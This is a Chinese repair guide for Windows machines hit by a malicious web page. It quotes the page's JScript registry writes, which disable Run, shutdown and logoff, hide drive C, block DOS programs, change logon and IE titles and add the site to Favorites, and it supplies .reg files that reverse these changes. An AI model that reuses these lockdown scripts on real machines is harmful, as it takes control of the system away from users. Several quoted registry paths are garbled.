被恶意网站击中的解决办法——注册表使用全攻略之六
被恶意网站击中的解决办法——注册表使用全攻略之六
10、浏览网页开始菜单被修改
1)禁止"关闭系统" 2)禁止"运行"
3)禁止"注销" 4)隐藏C盘--你的C盘找不到了!
5)禁止使用注册表编辑器regedit 6)禁止使用DOS程序
7)使系统无法进入"实模式" 8)禁止运行任何程序
注:以下是该网页修改受害者的注册表项所用的招数
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
注:使受害者系统没有“运行”项,这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoClose", 01, "REG_BINARY");
注:使受害者系统没有“关闭系统”项
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");
注:使受害者系统没有“注销”项
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
[1] [2] [3] [4] [5]
注:使受害者系统没有逻辑驱动器C
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\WinOldApp\\ Disabled","REG_BINARY");
注:禁止运行所有的DOS应用程序;
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\ \WinOldApp\\NoRealMode","REG_BINARY");
注:使系统不能启动到“实模式”(传统的DOS模式)下;
又注:进入该网页,它还会修改以下的注册表项,使WINDOWS系统登录时显示一个登录窗口(在MicroSoft网络用户登录之前)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeCaption", "呜啦啦...");
注:这些代码会使窗口的标题是“呜啦啦…”
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeText", "《呜啦啦...》
注:上面一行是会在窗口中显示出来的文字
注:下面两行代码修改注册表,使受害者所有的IE窗口都加上以下的标题:“呜啦啦…”
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "呜啦啦...");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "呜啦啦...");
注:到上面一行为止,完成了对受害者的注册表的所有修改!
注:下面代码用来将其网页增加到受害者的收藏夹中
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
注:下面就是使其网页加入到你的收藏夹的具体代码
AddFavLnk(loc, "找到感www.findfeel.com", "http://www.findfeel.com";)
受害用户的修复方法:
1:对于Win9x用户,建议在电脑启动时按F8键,选择到MS-DOS方式下,使用Scanreg/restore命令来恢复以前备份的、正常的注册表。
2:对于Win2000用户,把以下内容copy下来,存为unlock.reg文件,选带命令行的安全模式,用命令regedit unlock.reg导入,如何重启机器就OK了。
unlock.reg文件内容如下:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\System]
"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\System]
"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\WinOldApp]
"Disabled"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionPolicies\WinOldApp]
[1] [2] [3] [4] [5]
"NoRealMode"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersionWinlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE浏览器"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE浏览器"
11、IE中鼠标右键失效
浏览网页后在IE中鼠标右键失效,点击右键没有任何反应!
12、查看""源文件"菜单被禁用
在IE窗口中点击"查看"→"源文件","源文件"菜单已经被禁用。具体的位置为:在注册表
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer下建子键"Restrictions",然后在"Restrictions"下面建立两个DWORD值:"NoViewSource"和"NoBrowserContextMenu",并为这两个DWORD值赋值为"1"。
在注册表
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions下,将两个DWORD值:"NoViewSource"和"NoBrowserContextMenu"的键值都改为了"1"。
解决办法:
将以下内容另存为后缀名为reg的注册表文件,如unlock.reg,双击unlock.reg导入注册表,重新运行IE就会恢复正常。
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
《被恶意网站击中的解决办法——注册表使用全攻略之六》相关文章
- 被恶意网站击中的解决办法——注册表使用全攻略之六
- › 被恶意网站击中的解决办法——注册表使用全攻略之六
- 在百度中搜索相关文章:被恶意网站击中的解决办法——注册表使用全攻略之六
- 在谷歌中搜索相关文章:被恶意网站击中的解决办法——注册表使用全攻略之六
- 在soso中搜索相关文章:被恶意网站击中的解决办法——注册表使用全攻略之六
- 在搜狗中搜索相关文章:被恶意网站击中的解决办法——注册表使用全攻略之六
tag: 注册表,怎么打开注册表,注册表怎么打开,维修资料 - 电脑维修 - 注册表